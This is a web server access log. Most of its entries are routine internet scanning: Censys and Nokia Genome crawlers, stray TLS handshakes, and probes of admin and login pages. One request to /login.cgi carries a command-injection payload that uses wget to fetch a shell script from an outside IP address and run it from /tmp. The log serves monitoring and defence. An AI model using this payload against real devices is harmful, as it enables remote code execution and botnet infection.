18.175.120.105 - - [03/Oct/2024:03:45:25 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
104.248.20.143 - - [03/Oct/2024:03:45:54 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
185.191.126.213 - - [03/Oct/2024:03:46:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:03:47:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.99 - - [03/Oct/2024:03:47:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.99 - - [03/Oct/2024:03:47:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.99 - - [03/Oct/2024:03:47:22 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.99 - - [03/Oct/2024:03:47:22 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:47:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:48:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
95.214.55.138 - - [03/Oct/2024:03:48:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
18.175.120.105 - - [03/Oct/2024:03:49:35 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
18.175.120.105 - - [03/Oct/2024:03:50:07 +0200] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
18.175.120.105 - - [03/Oct/2024:03:52:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:53:20 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:54:46 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
37.139.5.66 - - [03/Oct/2024:03:54:53 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
185.191.126.213 - - [03/Oct/2024:03:54:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:55:22 +0200] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/networks/ip-networks/deepfield/genome/)'"
167.94.145.98 - - [03/Oct/2024:03:55:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.145.98 - - [03/Oct/2024:03:55:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.98 - - [03/Oct/2024:03:55:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.98 - - [03/Oct/2024:03:55:54 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:57:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
18.175.120.105 - - [03/Oct/2024:03:58:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.191.126.213 - - [03/Oct/2024:03:59:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [03/Oct/2024:03:59:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
